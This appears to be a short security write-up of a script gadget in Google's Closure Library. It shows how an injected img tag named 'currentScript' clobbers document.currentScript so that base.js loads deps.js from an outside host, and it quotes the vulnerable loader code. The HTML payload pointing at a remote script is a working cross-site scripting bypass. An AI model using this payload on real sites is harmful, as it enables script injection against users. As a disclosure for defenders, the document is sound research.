Closure Library is a powerful, low-level JavaScript library designed for building complex and scalable web applications. It is used by many Google web applications, such as Google Search, Gmail, Google Docs, Google+, Google Maps, and others.
The Google Closure Library was using the document.currentScript property to load additional scripts.
<!-- user input -->
<img name="currentScript" src="https://gmsgadget.com/assets/xss/base.js">
<script nonce="secret" src="https://cdnjs.cloudflare.com/ajax/libs/google-closure-library/20230103.0.0/base.js"></script>Root Cause
// If we have a currentScript available, use it exclusively.
var currentScript = doc.currentScript;
if (currentScript) {
var scripts = [currentScript];
} else {
var scripts = doc.getElementsByTagName('SCRIPT');
}
// Search backwards since the current script is in almost all cases the one
// that has base.js.
for (var i = scripts.length - 1; i >= 0; --i) {
var script = /** @type {!HTMLScriptElement} */ (scripts[i]);
var src = script.src;
var qmark = src.lastIndexOf('?');
var l = qmark == -1 ? src.length : qmark;
if (src.slice(l - 7, l) == 'base.js') {
goog.basePath = src.slice(0, l - 7);
return;
}
}
// [...]
goog.DebugLoader_.prototype.loadClosureDeps = function() {
// Circumvent addDependency, which would try to transpile deps.js if
// transpile is set to always.
var relPath = 'deps.js';
this.depsToLoad_.push(this.factory_.createDependency(
goog.normalizePath_(goog.basePath + relPath), relPath, [], [], {}));
this.loadDeps_();
};
Related links:
Found by jackfromeast, ishmeals.